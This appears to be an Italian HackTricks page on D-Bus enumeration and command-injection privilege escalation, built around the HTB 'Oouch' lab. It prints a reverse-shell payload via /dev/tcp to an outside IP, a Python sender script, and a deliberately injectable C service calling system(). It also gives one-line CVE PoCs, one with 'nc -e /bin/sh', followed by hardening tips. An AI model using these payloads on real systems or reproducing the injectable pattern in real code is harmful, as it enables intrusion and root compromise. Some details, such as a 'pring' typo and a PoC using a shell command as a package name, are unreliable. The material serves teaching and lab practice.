D-Bus Enumeration & Command Injection Privilege Escalation

Tip

Impara e pratica il hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Impara e pratica il hacking GCP: HackTricks Training GCP Red Team Expert (GRTE) Impara e pratica il hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Supporta HackTricks

Controlla i piani di abbonamento!

Unisciti al 💬 gruppo Discord o al gruppo telegram o seguici su Twitter 🐦 @hacktricks_live.

Condividi trucchi di hacking inviando PR ai HackTricks e HackTricks Cloud repos github.

GUI enumeration

D-Bus è utilizzato come mediatore per le comunicazioni inter-processo (IPC) negli ambienti desktop di Ubuntu. Su Ubuntu, si osserva il funzionamento simultaneo di diversi bus di messaggi: il bus di sistema, principalmente utilizzato da servizi privilegiati per esporre servizi rilevanti per l’intero sistema, e un bus di sessione per ogni utente connesso, che espone servizi rilevanti solo per quell’utente specifico. L’attenzione qui è principalmente sul bus di sistema a causa della sua associazione con servizi che operano con privilegi più elevati (ad esempio, root) poiché il nostro obiettivo è elevare i privilegi. Si nota che l’architettura di D-Bus impiega un ‘router’ per ogni bus di sessione, responsabile della reindirizzazione dei messaggi dei client ai servizi appropriati in base all’indirizzo specificato dai client per il servizio con cui desiderano comunicare.

I servizi su D-Bus sono definiti dagli oggetti e interfacce che espongono. Gli oggetti possono essere paragonati a istanze di classe nei linguaggi OOP standard, con ogni istanza identificata in modo univoco da un percorso oggetto. Questo percorso, simile a un percorso di filesystem, identifica in modo univoco ciascun oggetto esposto dal servizio. Un’interfaccia chiave per scopi di ricerca è l’interfaccia org.freedesktop.DBus.Introspectable, che presenta un metodo singolare, Introspect. Questo metodo restituisce una rappresentazione XML dei metodi, segnali e proprietà supportati dall’oggetto, con un focus qui sui metodi escludendo proprietà e segnali.

Per la comunicazione con l’interfaccia D-Bus, sono stati impiegati due strumenti: uno strumento CLI chiamato gdbus per l’invocazione facile dei metodi esposti da D-Bus negli script, e D-Feet, uno strumento GUI basato su Python progettato per enumerare i servizi disponibili su ciascun bus e per visualizzare gli oggetti contenuti all’interno di ciascun servizio.

sudo apt-get install d-feet

Nella prima immagine sono mostrati i servizi registrati con il bus di sistema D-Bus, con org.debin.apt evidenziato specificamente dopo aver selezionato il pulsante System Bus. D-Feet interroga questo servizio per oggetti, visualizzando interfacce, metodi, proprietà e segnali per gli oggetti scelti, come visto nella seconda immagine. La firma di ogni metodo è anche dettagliata.

Una caratteristica notevole è la visualizzazione del process ID (pid) e della linea di comando del servizio, utile per confermare se il servizio viene eseguito con privilegi elevati, importante per la rilevanza della ricerca.

D-Feet consente anche l’invocazione di metodi: gli utenti possono inserire espressioni Python come parametri, che D-Feet converte in tipi D-Bus prima di passarli al servizio.

Tuttavia, si noti che alcuni metodi richiedono autenticazione prima di consentirci di invocarli. Ignoreremo questi metodi, poiché il nostro obiettivo è elevare i nostri privilegi senza credenziali in primo luogo.

Si noti inoltre che alcuni dei servizi interrogano un altro servizio D-Bus chiamato org.freedeskto.PolicyKit1 se un utente dovrebbe essere autorizzato a eseguire determinate azioni o meno.

Enumerazione della linea di comando

Elenca gli oggetti del servizio

È possibile elencare le interfacce D-Bus aperte con:

busctl list #List D-Bus interfaces

NAME                                   PID PROCESS         USER             CONNECTION    UNIT                      SE
:1.0                                     1 systemd         root             :1.0          init.scope                -
:1.1345                              12817 busctl          qtc              :1.1345       session-729.scope         72
:1.2                                  1576 systemd-timesyn systemd-timesync :1.2          systemd-timesyncd.service -
:1.3                                  2609 dbus-server     root             :1.3          dbus-server.service       -
:1.4                                  2606 wpa_supplicant  root             :1.4          wpa_supplicant.service    -
:1.6                                  2612 systemd-logind  root             :1.6          systemd-logind.service    -
:1.8                                  3087 unattended-upgr root             :1.8          unattended-upgrades.serv… -
:1.820                                6583 systemd         qtc              :1.820        user@1000.service         -
com.ubuntu.SoftwareProperties            - -               -                (activatable) -                         -
fi.epitest.hostap.WPASupplicant       2606 wpa_supplicant  root             :1.4          wpa_supplicant.service    -
fi.w1.wpa_supplicant1                 2606 wpa_supplicant  root             :1.4          wpa_supplicant.service    -
htb.oouch.Block                       2609 dbus-server     root             :1.3          dbus-server.service       -
org.bluez                                - -               -                (activatable) -                         -
org.freedesktop.DBus                     1 systemd         root             -             init.scope                -
org.freedesktop.PackageKit               - -               -                (activatable) -                         -
org.freedesktop.PolicyKit1               - -               -                (activatable) -                         -
org.freedesktop.hostname1                - -               -                (activatable) -                         -
org.freedesktop.locale1                  - -               -                (activatable) -                         -

Connessioni

Da wikipedia: Quando un processo stabilisce una connessione a un bus, il bus assegna alla connessione un nome speciale chiamato nome di connessione unico. I nomi di bus di questo tipo sono immutabili: è garantito che non cambieranno finché la connessione esiste e, cosa più importante, non possono essere riutilizzati durante la vita del bus. Questo significa che nessun’altra connessione a quel bus avrà mai assegnato un nome di connessione unico, anche se lo stesso processo chiude la connessione al bus e ne crea una nuova. I nomi di connessione unici sono facilmente riconoscibili perché iniziano con il carattere due punti—altrimenti vietato.

Informazioni sull’oggetto del servizio

Poi, puoi ottenere alcune informazioni sull’interfaccia con:

busctl status htb.oouch.Block #Get info of "htb.oouch.Block" interface

PID=2609
PPID=1
TTY=n/a
UID=0
EUID=0
SUID=0
FSUID=0
GID=0
EGID=0
SGID=0
FSGID=0
SupplementaryGIDs=
Comm=dbus-server
CommandLine=/root/dbus-server
Label=unconfined
CGroup=/system.slice/dbus-server.service
Unit=dbus-server.service
Slice=system.slice
UserUnit=n/a
UserSlice=n/a
Session=n/a
AuditLoginUID=n/a
AuditSessionID=n/a
UniqueName=:1.3
EffectiveCapabilities=cap_chown cap_dac_override cap_dac_read_search
cap_fowner cap_fsetid cap_kill cap_setgid
cap_setuid cap_setpcap cap_linux_immutable cap_net_bind_service
cap_net_broadcast cap_net_admin cap_net_raw cap_ipc_lock
cap_ipc_owner cap_sys_module cap_sys_rawio cap_sys_chroot
cap_sys_ptrace cap_sys_pacct cap_sys_admin cap_sys_boot
cap_sys_nice cap_sys_resource cap_sys_time cap_sys_tty_config
cap_mknod cap_lease cap_audit_write cap_audit_control
cap_setfcap cap_mac_override cap_mac_admin cap_syslog
cap_wake_alarm cap_block_suspend cap_audit_read
PermittedCapabilities=cap_chown cap_dac_override cap_dac_read_search
cap_fowner cap_fsetid cap_kill cap_setgid
cap_setuid cap_setpcap cap_linux_immutable cap_net_bind_service
cap_net_broadcast cap_net_admin cap_net_raw cap_ipc_lock
cap_ipc_owner cap_sys_module cap_sys_rawio cap_sys_chroot
cap_sys_ptrace cap_sys_pacct cap_sys_admin cap_sys_boot
cap_sys_nice cap_sys_resource cap_sys_time cap_sys_tty_config
cap_mknod cap_lease cap_audit_write cap_audit_control
cap_setfcap cap_mac_override cap_mac_admin cap_syslog
cap_wake_alarm cap_block_suspend cap_audit_read
InheritableCapabilities=
BoundingCapabilities=cap_chown cap_dac_override cap_dac_read_search
cap_fowner cap_fsetid cap_kill cap_setgid
cap_setuid cap_setpcap cap_linux_immutable cap_net_bind_service
cap_net_broadcast cap_net_admin cap_net_raw cap_ipc_lock
cap_ipc_owner cap_sys_module cap_sys_rawio cap_sys_chroot
cap_sys_ptrace cap_sys_pacct cap_sys_admin cap_sys_boot
cap_sys_nice cap_sys_resource cap_sys_time cap_sys_tty_config
cap_mknod cap_lease cap_audit_write cap_audit_control
cap_setfcap cap_mac_override cap_mac_admin cap_syslog
cap_wake_alarm cap_block_suspend cap_audit_read

Elenca le interfacce di un oggetto servizio

Devi avere permessi sufficienti.

busctl tree htb.oouch.Block #Get Interfaces of the service object

└─/htb
└─/htb/oouch
└─/htb/oouch/Block

Introspect Interface of a Service Object

Nota come in questo esempio è stata selezionata l’ultima interfaccia scoperta utilizzando il parametro tree (vedi sezione precedente):

busctl introspect htb.oouch.Block /htb/oouch/Block #Get methods of the interface

NAME                                TYPE      SIGNATURE RESULT/VALUE FLAGS
htb.oouch.Block                     interface -         -            -
.Block                              method    s         s            -
org.freedesktop.DBus.Introspectable interface -         -            -
.Introspect                         method    -         s            -
org.freedesktop.DBus.Peer           interface -         -            -
.GetMachineId                       method    -         s            -
.Ping                               method    -         -            -
org.freedesktop.DBus.Properties     interface -         -            -
.Get                                method    ss        v            -
.GetAll                             method    s         a{sv}        -
.Set                                method    ssv       -            -
.PropertiesChanged                  signal    sa{sv}as  -            -

Nota il metodo .Block dell’interfaccia htb.oouch.Block (quello che ci interessa). La “s” delle altre colonne potrebbe significare che si aspetta una stringa.

Interfaccia di Monitoraggio/Cattura

Con privilegi sufficienti (solo i privilegi send_destination e receive_sender non sono sufficienti) puoi monitorare una comunicazione D-Bus.

Per monitorare una comunicazione devi essere root. Se riscontri ancora problemi ad essere root, controlla https://piware.de/2013/09/how-to-watch-system-d-bus-method-calls/ e https://wiki.ubuntu.com/DebuggingDBus

Warning

Se sai come configurare un file di configurazione D-Bus per consentire agli utenti non root di sniffare la comunicazione, per favore contattami!

Diversi modi per monitorare:

sudo busctl monitor htb.oouch.Block #Monitor only specified
sudo busctl monitor #System level, even if this works you will only see messages you have permissions to see
sudo dbus-monitor --system #System level, even if this works you will only see messages you have permissions to see

Nell’esempio seguente, l’interfaccia htb.oouch.Block è monitorata e il messaggio “lalalalal” viene inviato attraverso una comunicazione errata:

busctl monitor htb.oouch.Block

Monitoring bus message stream.
‣ Type=method_call  Endian=l  Flags=0  Version=1  Priority=0 Cookie=2
Sender=:1.1376  Destination=htb.oouch.Block  Path=/htb/oouch/Block  Interface=htb.oouch.Block  Member=Block
UniqueName=:1.1376
MESSAGE "s" {
STRING "lalalalal";
};

‣ Type=method_return  Endian=l  Flags=1  Version=1  Priority=0 Cookie=16  ReplyCookie=2
Sender=:1.3  Destination=:1.1376
UniqueName=:1.3
MESSAGE "s" {
STRING "Carried out :D";
};

Puoi usare capture invece di monitor per salvare i risultati in un file pcap.

Filtrare tutto il rumore

Se ci sono troppe informazioni sul bus, passa una regola di corrispondenza in questo modo:

dbus-monitor "type=signal,sender='org.gnome.TypingMonitor',interface='org.gnome.TypingMonitor'"

È possibile specificare più regole. Se un messaggio corrisponde a qualunque delle regole, il messaggio verrà stampato. Così:

dbus-monitor "type=error" "sender=org.freedesktop.SystemToolsBackends"

dbus-monitor "type=method_call" "type=method_return" "type=error"

Consulta la documentazione di D-Bus per ulteriori informazioni sulla sintassi delle regole di corrispondenza.

Maggiori informazioni

busctl ha ancora più opzioni, trovale tutte qui.

Scenario Vulnerabile

Come utente qtc all’interno dell’host “oouch” di HTB puoi trovare un file di configurazione D-Bus inaspettato situato in /etc/dbus-1/system.d/htb.oouch.Block.conf:

<?xml version="1.0" encoding="UTF-8"?> <!-- -*- XML -*- -->

<!DOCTYPE busconfig PUBLIC
"-//freedesktop//DTD D-BUS Bus Configuration 1.0//EN"
"http://www.freedesktop.org/standards/dbus/1.0/busconfig.dtd">

<busconfig>

<policy user="root">
<allow own="htb.oouch.Block"/>
</policy>

<policy user="www-data">
<allow send_destination="htb.oouch.Block"/>
<allow receive_sender="htb.oouch.Block"/>
</policy>

</busconfig>

Nota dalla configurazione precedente che è necessario essere l’utente root o www-data per inviare e ricevere informazioni tramite questa comunicazione D-BUS.

Come utente qtc all’interno del contenitore docker aeb4525789d8 puoi trovare del codice relativo a dbus nel file /code/oouch/routes.py. Questo è il codice interessante:

if primitive_xss.search(form.textfield.data):
bus = dbus.SystemBus()
block_object = bus.get_object('htb.oouch.Block', '/htb/oouch/Block')
block_iface = dbus.Interface(block_object, dbus_interface='htb.oouch.Block')

client_ip = request.environ.get('REMOTE_ADDR', request.remote_addr)
response = block_iface.Block(client_ip)
bus.close()
return render_template('hacker.html', title='Hacker')

Come puoi vedere, si sta collegando a un’interfaccia D-Bus e inviando alla funzione “Block” l’“client_ip”.

Dall’altra parte della connessione D-Bus c’è un binario compilato in C in esecuzione. Questo codice sta ascoltando nella connessione D-Bus per indirizzi IP e sta chiamando iptables tramite la funzione system per bloccare l’indirizzo IP fornito.
La chiamata a system è vulnerabile di proposito all’injection di comandi, quindi un payload come il seguente creerà una reverse shell: ;bash -c 'bash -i >& /dev/tcp/10.10.14.44/9191 0>&1' #

Sfruttalo

Alla fine di questa pagina puoi trovare il codice C completo dell’applicazione D-Bus. All’interno puoi trovare tra le righe 91-97 come il D-Bus object path e il interface name sono registrati. Queste informazioni saranno necessarie per inviare informazioni alla connessione D-Bus:

/* Install the object */
r = sd_bus_add_object_vtable(bus,
&slot,
"/htb/oouch/Block",  /* interface */
"htb.oouch.Block",   /* service object */
block_vtable,
NULL);

Inoltre, nella riga 57 puoi trovare che l’unico metodo registrato per questa comunicazione D-Bus si chiama Block(Ecco perché nella sezione seguente i payload verranno inviati all’oggetto servizio htb.oouch.Block, all’interfaccia /htb/oouch/Block e al nome del metodo Block):

SD_BUS_METHOD("Block", "s", "s", method_block, SD_BUS_VTABLE_UNPRIVILEGED),

Python

Il seguente codice python invierà il payload alla connessione D-Bus al metodo Block tramite block_iface.Block(runme) (nota che è stato estratto dal blocco di codice precedente):

import dbus
bus = dbus.SystemBus()
block_object = bus.get_object('htb.oouch.Block', '/htb/oouch/Block')
block_iface = dbus.Interface(block_object, dbus_interface='htb.oouch.Block')
runme = ";bash -c 'bash -i >& /dev/tcp/10.10.14.44/9191 0>&1' #"
response = block_iface.Block(runme)
bus.close()

busctl e dbus-send

dbus-send --system --print-reply --dest=htb.oouch.Block /htb/oouch/Block htb.oouch.Block.Block string:';pring -c 1 10.10.14.44 #'

dbus-send è uno strumento utilizzato per inviare messaggi al “Message Bus”
Message Bus – Un software utilizzato dai sistemi per facilitare le comunicazioni tra le applicazioni. È correlato a Message Queue (i messaggi sono ordinati in sequenza) ma nel Message Bus i messaggi vengono inviati in un modello di abbonamento e sono anche molto veloci.
Il tag “-system” viene utilizzato per indicare che si tratta di un messaggio di sistema, non di un messaggio di sessione (per impostazione predefinita).
Il tag “–print-reply” viene utilizzato per stampare il nostro messaggio in modo appropriato e ricevere eventuali risposte in un formato leggibile dall’uomo.
“–dest=Dbus-Interface-Block” L’indirizzo dell’interfaccia Dbus.
“–string:” – Tipo di messaggio che desideriamo inviare all’interfaccia. Ci sono diversi formati per inviare messaggi come double, bytes, booleans, int, objpath. Tra questi, il “object path” è utile quando vogliamo inviare un percorso di un file all’interfaccia Dbus. Possiamo utilizzare un file speciale (FIFO) in questo caso per passare un comando all’interfaccia nel nome di un file. “string:;” – Questo serve a richiamare nuovamente il percorso dell’oggetto dove posizioniamo il file/comando della shell inversa FIFO.

Note che in htb.oouch.Block.Block, la prima parte (htb.oouch.Block) fa riferimento all’oggetto servizio e l’ultima parte (.Block) fa riferimento al nome del metodo.

C code

//sudo apt install pkgconf
//sudo apt install libsystemd-dev
//gcc d-bus_server.c -o dbus_server `pkg-config --cflags --libs libsystemd`

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <systemd/sd-bus.h>

static int method_block(sd_bus_message *m, void *userdata, sd_bus_error *ret_error) {
char* host = NULL;
int r;

/* Read the parameters */
r = sd_bus_message_read(m, "s", &host);
if (r < 0) {
fprintf(stderr, "Failed to obtain hostname: %s\n", strerror(-r));
return r;
}

char command[] = "iptables -A PREROUTING -s %s -t mangle -j DROP";

int command_len = strlen(command);
int host_len = strlen(host);

char* command_buffer = (char *)malloc((host_len + command_len) * sizeof(char));
if(command_buffer == NULL) {
fprintf(stderr, "Failed to allocate memory\n");
return -1;
}

sprintf(command_buffer, command, host);

/* In the first implementation, we simply ran command using system(), since the expected DBus
* to be threading automatically. However, DBus does not thread and the application will hang
* forever if some user spawns a shell. Thefore we need to fork (easier than implementing real
* multithreading)
*/
int pid = fork();

if ( pid == 0 ) {
/* Here we are in the child process. We execute the command and eventually exit. */
system(command_buffer);
exit(0);
} else {
/* Here we are in the parent process or an error occured. We simply send a genric message.
* In the first implementation we returned separate error messages for success or failure.
* However, now we cannot wait for results of the system call. Therefore we simply return
* a generic. */
return sd_bus_reply_method_return(m, "s", "Carried out :D");
}
r = system(command_buffer);
}


/* The vtable of our little object, implements the net.poettering.Calculator interface */
static const sd_bus_vtable block_vtable[] = {
SD_BUS_VTABLE_START(0),
SD_BUS_METHOD("Block", "s", "s", method_block, SD_BUS_VTABLE_UNPRIVILEGED),
SD_BUS_VTABLE_END
};


int main(int argc, char *argv[]) {
/*
* Main method, registeres the htb.oouch.Block service on the system dbus.
*
* Paramaters:
*      argc            (int)             Number of arguments, not required
*      argv[]          (char**)          Argument array, not required
*
* Returns:
*      Either EXIT_SUCCESS ot EXIT_FAILURE. Howeverm ideally it stays alive
*      as long as the user keeps it alive.
*/


/* To prevent a huge numer of defunc process inside the tasklist, we simply ignore client signals */
signal(SIGCHLD,SIG_IGN);

sd_bus_slot *slot = NULL;
sd_bus *bus = NULL;
int r;

/* First we need to connect to the system bus. */
r = sd_bus_open_system(&bus);
if (r < 0)
{
fprintf(stderr, "Failed to connect to system bus: %s\n", strerror(-r));
goto finish;
}

/* Install the object */
r = sd_bus_add_object_vtable(bus,
&slot,
"/htb/oouch/Block",  /* interface */
"htb.oouch.Block",   /* service object */
block_vtable,
NULL);
if (r < 0) {
fprintf(stderr, "Failed to install htb.oouch.Block: %s\n", strerror(-r));
goto finish;
}

/* Register the service name to find out object */
r = sd_bus_request_name(bus, "htb.oouch.Block", 0);
if (r < 0) {
fprintf(stderr, "Failed to acquire service name: %s\n", strerror(-r));
goto finish;
}

/* Infinite loop to process the client requests */
for (;;) {
/* Process requests */
r = sd_bus_process(bus, NULL);
if (r < 0) {
fprintf(stderr, "Failed to process bus: %s\n", strerror(-r));
goto finish;
}
if (r > 0) /* we processed a request, try to process another one, right-away */
continue;

/* Wait for the next request to process */
r = sd_bus_wait(bus, (uint64_t) -1);
if (r < 0) {
fprintf(stderr, "Failed to wait on bus: %s\n", strerror(-r));
goto finish;
}
}

finish:
sd_bus_slot_unref(slot);
sd_bus_unref(bus);

return r < 0 ? EXIT_FAILURE : EXIT_SUCCESS;
}

Automated Enumeration Helpers (2023-2025)

L’enumerazione manuale di una vasta superficie di attacco D-Bus con busctl/gdbus diventa rapidamente dolorosa. Due piccoli strumenti FOSS rilasciati negli ultimi anni possono accelerare le cose durante gli impegni di red-team o CTF:

dbusmap (“Nmap per D-Bus”)

Autore: @taviso – https://github.com/taviso/dbusmap
Scritto in C; singolo binario statico (<50 kB) che percorre ogni percorso oggetto, estrae l’XML Introspect e lo mappa al PID/UID proprietario.
Flag utili:

# Elenca ogni servizio sul bus *di sistema* e dumpa tutti i metodi chiamabili
sudo dbus-map --dump-methods

# Prova attivamente metodi/proprietà che puoi raggiungere senza prompt di Polkit
sudo dbus-map --enable-probes --null-agent --dump-methods --dump-properties

Lo strumento contrassegna i nomi ben noti non protetti con !, rivelando istantaneamente i servizi che puoi possedere (prendere il controllo) o le chiamate ai metodi che sono raggiungibili da una shell non privilegiata.

uptux.py

Autore: @initstring – https://github.com/initstring/uptux
Script solo Python che cerca percorsi scrivibili nelle unità systemd e file di policy D-Bus eccessivamente permissivi (es. send_destination="*").
Uso rapido:

python3 uptux.py -n          # esegui tutti i controlli ma non scrivere un file di log
python3 uptux.py -d          # abilita l'output di debug verboso

Il modulo D-Bus cerca le directory sottostanti e evidenzia qualsiasi servizio che può essere falsificato o dirottato da un utente normale:
/etc/dbus-1/system.d/ e /usr/share/dbus-1/system.d/
/etc/dbus-1/system-local.d/ (override del fornitore)

Notable D-Bus Privilege-Escalation Bugs (2024-2025)

Tenere d’occhio le CVE pubblicate di recente aiuta a individuare schemi insicuri simili nel codice personalizzato. I seguenti problemi EoP locali ad alto impatto derivano tutti dalla mancanza di autenticazione/autorizzazione sul bus di sistema:

Anno	CVE	Componente	Causa Radice	PoC in una riga
2024	CVE-2024-45752	`logiops` ≤ 0.3.4 (daemon HID Logitech)	Il servizio di sistema `logid` espone un’interfaccia `org.freedesktop.Logiopsd` senza restrizioni che consente a qualsiasi utente di cambiare i profili dei dispositivi e iniettare comandi shell arbitrari tramite stringhe macro.	`gdbus call -y -d org.freedesktop.Logiopsd -o /org/freedesktop/Logiopsd -m org.freedesktop.Logiopsd.LoadConfig "/tmp/pwn.yml"`
2025	CVE-2025-23222	Deepin `dde-api-proxy` ≤ 1.0.18	Un proxy in esecuzione come root inoltra nomi di bus legacy ai servizi backend senza inoltrare il contesto UID/Polkit del chiamante, quindi ogni richiesta inoltrata è trattata come UID 0.	`gdbus call -y -d com.deepin.daemon.Grub2 -o /com/deepin/daemon/Grub2 -m com.deepin.daemon.Grub2.SetTimeout 1`
2025	CVE-2025-3931	Red Hat Insights `yggdrasil` ≤ 0.4.6	Il metodo pubblico `Dispatch` manca di ACL → l’attaccante può ordinare al lavoratore del package-manager di installare RPM arbitrari.	`dbus-send --system --dest=com.redhat.yggdrasil /com/redhat/Dispatch com.redhat.yggdrasil.Dispatch string:'{"worker":"pkg","action":"install","pkg":"nc -e /bin/sh"}'`

Schemi da notare:

Il servizio viene eseguito come root sul bus di sistema.
Nessun controllo PolicyKit (o viene bypassato da un proxy).
Il metodo porta infine a system()/installazione di pacchetti/riconfigurazione del dispositivo → esecuzione di codice.

Usa dbusmap --enable-probes o busctl call manuale per confermare se una patch riporta la logica corretta di polkit_authority_check_authorization().

Hardening & Detection Quick-Wins

Cerca politiche scrivibili a livello mondiale o send/receive-aperte:

grep -R --color -nE '<allow (own|send_destination|receive_sender)="[^"]*"' /etc/dbus-1/system.d /usr/share/dbus-1/system.d

Richiedi Polkit per metodi pericolosi – anche i proxy root dovrebbero passare il PID del chiamante a polkit_authority_check_authorization_sync() invece del proprio.
Riduci i privilegi negli helper a lungo termine (usa sd_pid_get_owner_uid() per cambiare namespace dopo esserti connesso al bus).
Se non puoi rimuovere un servizio, almeno limitalo a un gruppo Unix dedicato e restringi l’accesso nella sua policy XML.
Blue-team: abilita la cattura persistente del bus di sistema con busctl capture --output=/var/log/dbus_$(date +%F).pcap e importa in Wireshark per la rilevazione di anomalie.

References

Tip

Impara e pratica il hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Impara e pratica il hacking GCP: HackTricks Training GCP Red Team Expert (GRTE) Impara e pratica il hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Supporta HackTricks

Controlla i piani di abbonamento!

Unisciti al 💬 gruppo Discord o al gruppo telegram o seguici su Twitter 🐦 @hacktricks_live.

Condividi trucchi di hacking inviando PR ai HackTricks e HackTricks Cloud repos github.